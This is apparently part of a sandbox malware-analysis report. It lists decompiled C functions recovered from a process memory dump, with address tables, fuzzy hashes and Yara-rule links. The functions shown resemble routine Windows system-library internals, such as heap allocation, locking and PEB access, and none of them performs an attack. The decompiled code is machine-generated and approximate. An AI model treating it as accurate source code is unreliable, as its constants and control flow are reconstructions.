                                                      0x04987062
                                                      0x04987062
                                                      0x0498705a
                                                      0x04987064
                                                      0x04987064
                                                      0x04987067
                                                      0x04987071
                                                      0x04987096
                                                      0x0498709b
                                                      0x049870a2
                                                      0x049870a6
                                                      0x049870a7
                                                      0x049870ad
                                                      0x049870b3
                                                      0x049870b6
                                                      0x049870bb
                                                      0x049870c3
                                                      0x049870c3
                                                      0x049870c6
                                                      0x049870cd
                                                      0x049870dd
                                                      0x049870e0
                                                      0x049870e2
                                                      0x049870e2
                                                      0x049870ee
                                                      0x04987101
                                                      0x049870f0
                                                      0x049870f9
                                                      0x049870f9
                                                      0x0498710a
                                                      0x0498710e
                                                      0x04987112
                                                      0x04987117
                                                      0x04987118
                                                      0x04987118
                                                      0x049870bb
                                                      0x0498711d
                                                      0x04987123
                                                      0x04987131
                                                      0x04987131
                                                      0x04987136
                                                      0x0498713d
                                                      0x0498713e
                                                      0x0498713f
                                                      0x0498714a
                                                      0x0498714a
                                                      0x04987084
                                                      0x04987088
                                                      0x00000000
                                                      0x0498708e
                                                      0x0498708e
                                                      0x04987092
                                                      0x00000000
                                                      0x04987092

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 12886e8ad79071e801434ecf9f2b598a96ea24c3e51fd73a02246314f25ae2cb
                                                      • Instruction ID: 2d7f7e484c220fac35c212aeb8f4150841cee197a7071c7c85895a9d48352803
                                                      • Opcode Fuzzy Hash: 12886e8ad79071e801434ecf9f2b598a96ea24c3e51fd73a02246314f25ae2cb
                                                      • Instruction Fuzzy Hash: F33182726087519BC320EFA8CD40E6AB7A9BFC8704F144A6DF8959B690E734F904C7A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0492C182, Relevance: .1, Instructions: 104COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 68%
                                                      			E0492C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E04927D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E049D8D34(_v8, _t80);
					}
					E04922280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E0491FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E049D8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E0491FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0494B180();
						if(_a4 != 0) {
							E04922280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0492BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0492BB2D(_t16, _t15);
						E0492B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E0491FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E0491FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E0491FFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                      0x0492c18d
                                                      0x0492c18f
                                                      0x0492c191
                                                      0x0492c19b
                                                      0x0492c1a0
                                                      0x0492c1d4
                                                      0x0492c1de
                                                      0x04972d6e
                                                      0x0492c1e4
                                                      0x0492c1e4
                                                      0x0492c1e4
                                                      0x0492c1ec
                                                      0x04972d7d
                                                      0x04972d7d
                                                      0x0492c1f3
                                                      0x0492c1ff
                                                      0x04972d88
                                                      0x04972d8d
                                                      0x04972d94
                                                      0x04972d94
                                                      0x04972d9f
                                                      0x04972da4
                                                      0x04972dab
                                                      0x04972db0
                                                      0x04972db2
                                                      0x04972db3
                                                      0x04972db4
                                                      0x04972dbc
                                                      0x04972dc3
                                                      0x04972dc3
                                                      0x0492c205
                                                      0x0492c205
                                                      0x0492c208
                                                      0x0492c20e
                                                      0x0492c211
                                                      0x0492c216
                                                      0x0492c219
                                                      0x0492c21f
                                                      0x0492c222
                                                      0x0492c22c
                                                      0x0492c234
                                                      0x0492c23a
                                                      0x0492c23f
                                                      0x0492c245
                                                      0x0492c24b
                                                      0x0492c251
                                                      0x0492c25a
                                                      0x0492c276
                                                      0x0492c27d
                                                      0x0492c27d
                                                      0x0492c25c
                                                      0x0492c25c
                                                      0x00000000
                                                      0x0492c25e
                                                      0x0492c1a4
                                                      0x0492c1aa
                                                      0x0492c1b3
                                                      0x0492c265
                                                      0x0492c26c
                                                      0x0492c26c
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                      • Instruction ID: df4c5ea3eae37ca7123fccfedd3d8fa689abf5b11ae9d6da9f4ac7dc99d5747a
                                                      • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                      • Instruction Fuzzy Hash: 2C31287170155AAEE704EBB4C580BEDFB58BF82308F04817AD41C57349DB34BA49D7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0493A70E, Relevance: .1, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 92%
                                                      			E0493A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x49f7b10; // 0x8
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x49f7b10 = 8;
					 *0x49f7b14 = 0x49f7b0c;
					 *0x49f7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x9
					E0493A990(0x49f7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0493A840(__edx, __ecx, __ecx, _t52, 0x49f7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x49f7b10; // 0x8
					_t3 = _t37 + 0x27; // 0x2f
					__eflags = _t3 >> 5 -  *0x49f7b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x49f7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x2f
						_v8 = _t4 >> 5;
						_t50 = L04924620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x49f7b18 = _v8;
						_t8 = _t52 + 7; // 0xf
						E0494F3E0(_t50,  *0x49f7b14, _t8 >> 3);
						_t28 =  *0x49f7b14; // 0x773b7b0c
						__eflags = _t28 - 0x49f7b0c;
						if(_t28 != 0x49f7b0c) {
							L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x10
						 *0x49f7b14 = _t50;
						_t48 = _v12;
						 *0x49f7b10 = _t9;
						goto L6;
					}
					 *0x49f7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                      0x0493a713
                                                      0x0493a714
                                                      0x0493a717
                                                      0x0493a71d
                                                      0x0493a720
                                                      0x0493a722
                                                      0x0493a727
                                                      0x0493a74a
                                                      0x0493a754
                                                      0x0493a75e
                                                      0x0493a768
                                                      0x0493a76a
                                                      0x0493a773
                                                      0x0493a78b
                                                      0x0493a790
                                                      0x0493a792
                                                      0x0493a741
                                                      0x0493a741
                                                      0x0493a743
                                                      0x0493a749
                                                      0x0493a749
                                                      0x0493a732
                                                      0x0493a73a
                                                      0x0493a797
                                                      0x0493a79d
                                                      0x0493a7a3
                                                      0x0493a7a9
                                                      0x0493a7b6
                                                      0x0493a7bc
                                                      0x0493a7ca
                                                      0x0493a7e0
                                                      0x0493a7e2
                                                      0x0493a7e4
                                                      0x04979bf2
                                                      0x00000000
                                                      0x04979bf2
                                                      0x0493a7ed
                                                      0x0493a7f2
                                                      0x0493a800
                                                      0x0493a805
                                                      0x0493a80d
                                                      0x0493a812
                                                      0x04979c08
                                                      0x04979c08
                                                      0x0493a818
                                                      0x0493a81b
                                                      0x0493a821
                                                      0x0493a824
                                                      0x00000000
                                                      0x0493a824
                                                      0x0493a7ae
                                                      0x00000000
                                                      0x0493a7ae
                                                      0x0493a73c
                                                      0x0493a73e
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2a9e75d72602f79bf3ff6dd0e007ad209a2eae5f55c0bde4bdf5174fa5a6367c
                                                      • Instruction ID: 45fca3c0e4bfbf58395848909a45d8dac41b0aa38000a992abf376325456ae7e
                                                      • Opcode Fuzzy Hash: 2a9e75d72602f79bf3ff6dd0e007ad209a2eae5f55c0bde4bdf5174fa5a6367c
                                                      • Instruction Fuzzy Hash: 1331AEB1A242009FD711CB98D880F6A7BFAEB87712F1409BAE14597240D7B8AD01CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049361A0, Relevance: .1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 97%
                                                      			E049361A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E04935E50(0x48e67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E049D9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E0490F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                      0x049361b3
                                                      0x049361b5
                                                      0x049361bd
                                                      0x049361c3
                                                      0x049361c7
                                                      0x049361d2
                                                      0x049361ff
                                                      0x049361ff
                                                      0x04936201
                                                      0x04936207
                                                      0x04936207
                                                      0x049361d4
                                                      0x049361d9
                                                      0x00000000
                                                      0x00000000
                                                      0x049361df
                                                      0x049361e2
                                                      0x00000000
                                                      0x00000000
                                                      0x049361e6
                                                      0x049361e8
                                                      0x049361ee
                                                      0x049361ee
                                                      0x049361f9
                                                      0x0497762f
                                                      0x04977632
                                                      0x04977635
                                                      0x04977639
                                                      0x04977640
                                                      0x0497766e
                                                      0x04977675
                                                      0x00000000
                                                      0x00000000
                                                      0x04977681
                                                      0x04977689
                                                      0x0497768d
                                                      0x04977691
                                                      0x04977695
                                                      0x04977699
                                                      0x049776af
                                                      0x049776b5
                                                      0x049776b7
                                                      0x049776b7
                                                      0x049776d7
                                                      0x049776dc
                                                      0x00000000
                                                      0x049776dc
                                                      0x049776a2
                                                      0x049776a9
                                                      0x04977651
                                                      0x04977653
                                                      0x04977653
                                                      0x04977656
                                                      0x04977656
                                                      0x00000000
                                                      0x04977656
                                                      0x04977644
                                                      0x04977646
                                                      0x04977648
                                                      0x04977648
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6a863cd97638b9d79e00c3acac0e1134f8cf61389efdfb5a71d55813a93e2406
                                                      • Instruction ID: d9d974294a4ef8de7c2906dd1164587e5ddb00e93ee40ef976d752fdb063e1ac
                                                      • Opcode Fuzzy Hash: 6a863cd97638b9d79e00c3acac0e1134f8cf61389efdfb5a71d55813a93e2406
                                                      • Instruction Fuzzy Hash: AC3158716057019FD360DF59C840B26B7E9EB88B04F0549BDE9989B255E7B0FD04CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0490AA16, Relevance: .1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 95%
                                                      			E0490AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x49fd360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x49f7b9c; // 0x0
					_t53 = L04924620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0494B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0494F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L04916C59(_t53, _t51, _t58) != 0) {
							_t28 = E04935E50(0x48ec338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0493B230(_v32, _v28, 0x48ec2d8, 1,  &_v24);
								_t28 = E0490F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                      0x0490aa25
                                                      0x0490aa29
                                                      0x0490aa2d
                                                      0x0490aa30
                                                      0x0490aa37
                                                      0x0490aa3c
                                                      0x04964458
                                                      0x04964458
                                                      0x04964472
                                                      0x04964474
                                                      0x04964476
                                                      0x0490aa64
                                                      0x0490aa74
                                                      0x0496447c
                                                      0x04964483
                                                      0x04964492
                                                      0x0490aa52
                                                      0x0490aa54
                                                      0x0490aa5e
                                                      0x049644a8
                                                      0x049644ad
                                                      0x049644af
                                                      0x049644b6
                                                      0x049644b6
                                                      0x049644b9
                                                      0x049644bc
                                                      0x049644cd
                                                      0x049644d3
                                                      0x049644d6
                                                      0x049644e1
                                                      0x049644e1
                                                      0x049644e6
                                                      0x049644e8
                                                      0x049644fb
                                                      0x049644fb
                                                      0x049644e8
                                                      0x00000000
                                                      0x0490aa5e
                                                      0x04964476
                                                      0x0490aa42
                                                      0x0490aa46
                                                      0x0490aa48
                                                      0x0490aa4c
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 05ffea1f1d7765346e206f4fdf3c738954caf69e1955ab24d6924ae9f249655b
                                                      • Instruction ID: 234be6668fe12556a150bea128e41d7e73c5a581f4eb77061942a16e49c42031
                                                      • Opcode Fuzzy Hash: 05ffea1f1d7765346e206f4fdf3c738954caf69e1955ab24d6924ae9f249655b
                                                      • Instruction Fuzzy Hash: C731B171A00219AFDB149FA4CD41ABFB7B9EF88704B014479F901E7290E774BD11DBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04948EC7, Relevance: .1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 93%
                                                      			E04948EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x49fd360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E04934E70(0x49f86e4, 0x4949490, 0, 0);
					if( *0x49f53e8 > 5 && E04948F33(0x49f53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x49f53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x49f53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x48ebc46;
						_t48 = E04987B9C(0x49f53e8, 0x48ebc46, _t67, 0x49f53e8, _t70,  &_v140);
					}
				}
				return E0494B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                      0x04948ec7
                                                      0x04948ed9
                                                      0x04948edc
                                                      0x04948ee6
                                                      0x04948ee9
                                                      0x04948eee
                                                      0x04948efc
                                                      0x04948f08
                                                      0x04981349
                                                      0x04981353
                                                      0x0498135d
                                                      0x04981366
                                                      0x0498136f
                                                      0x04981375
                                                      0x0498137c
                                                      0x04981385
                                                      0x04981390
                                                      0x04981391
                                                      0x0498139c
                                                      0x0498139d
                                                      0x049813a6
                                                      0x049813ac
                                                      0x049813b2
                                                      0x049813b5
                                                      0x049813bc
                                                      0x049813bf
                                                      0x049813c2
                                                      0x049813c5
                                                      0x049813c8
                                                      0x049813cb
                                                      0x049813ce
                                                      0x049813d1
                                                      0x049813d4
                                                      0x049813d7
                                                      0x049813da
                                                      0x049813dd
                                                      0x049813e0
                                                      0x049813e3
                                                      0x049813e6
                                                      0x049813e9
                                                      0x049813f6
                                                      0x04981400
                                                      0x04981400
                                                      0x04948f08
                                                      0x04948f32

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 715b87de52a6e7c558e40eedaabb510bff7585a3726a3ece5c659df14e87ff52
                                                      • Instruction ID: 774ba9c2cb90a037adda6aca74e0fb210a349f185614acfd20828da347fce699
                                                      • Opcode Fuzzy Hash: 715b87de52a6e7c558e40eedaabb510bff7585a3726a3ece5c659df14e87ff52
                                                      • Instruction Fuzzy Hash: 7C4191B1D002189FDB20DFAAD981AADFBF4FB88314F5041BEE509A7200E774AA44CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04944A2C, Relevance: .1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E04944A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x49fd360 ^ _t62;
				_v8 =  *0x49fd360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E04922280(_t26, 0x49f8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E0491FFB0(_t41, _t51, 0x49f8608);
						L2:
						 *0x49fb1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0494B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E04922280(_t28, 0x49f8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E0491FFB0(_t42, _t53, 0x49f8608);
							if(_t53 != 0) {
								L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E0491FFB0(_t41, _t51, 0x49f8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                      0x04944a2c
                                                      0x04944a34
                                                      0x04944a3c
                                                      0x04944a3e
                                                      0x04944a48
                                                      0x04944a4b
                                                      0x04944a4d
                                                      0x04944a51
                                                      0x04944a9c
                                                      0x00000000
                                                      0x00000000
                                                      0x04944aa3
                                                      0x04944aa8
                                                      0x04944aad
                                                      0x04944ab1
                                                      0x04944ade
                                                      0x04944ae3
                                                      0x04944a5a
                                                      0x04944a62
                                                      0x04944a6a
                                                      0x04944a6e
                                                      0x0497f203
                                                      0x04944a84
                                                      0x04944a88
                                                      0x04944a89
                                                      0x04944a8a
                                                      0x04944a95
                                                      0x04944a95
                                                      0x04944a79
                                                      0x04944a80
                                                      0x04944af2
                                                      0x04944af4
                                                      0x04944af9
                                                      0x04944aff
                                                      0x04944b01
                                                      0x04944b03
                                                      0x04944b08
                                                      0x0497f20a
                                                      0x0497f212
                                                      0x0497f216
                                                      0x0497f216
                                                      0x04944b08
                                                      0x04944b13
                                                      0x04944b1a
                                                      0x0497f229
                                                      0x0497f229
                                                      0x04944b1a
                                                      0x04944a82
                                                      0x00000000
                                                      0x04944a82
                                                      0x04944ab7
                                                      0x04944acd
                                                      0x04944acd
                                                      0x04944ad5
                                                      0x04944ada
                                                      0x00000000
                                                      0x04944ada
                                                      0x04944ac2
                                                      0x04944acb
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04944acb
                                                      0x04944a53
                                                      0x04944a53
                                                      0x04944a58
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: af2e104397ada4835aff345504cb09f629815a8bb2c28f0b79af167ba4aea0c3
                                                      • Instruction ID: ea987b70b0132d770dc98b1d4dacd07c6307f63c3f9fa9a2a7e3918f85769eca
                                                      • Opcode Fuzzy Hash: af2e104397ada4835aff345504cb09f629815a8bb2c28f0b79af167ba4aea0c3
                                                      • Instruction Fuzzy Hash: 353100323452109BD761EF54CD40F2ABBA9FFC0B18F400939E9560B284DBB0F800CB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

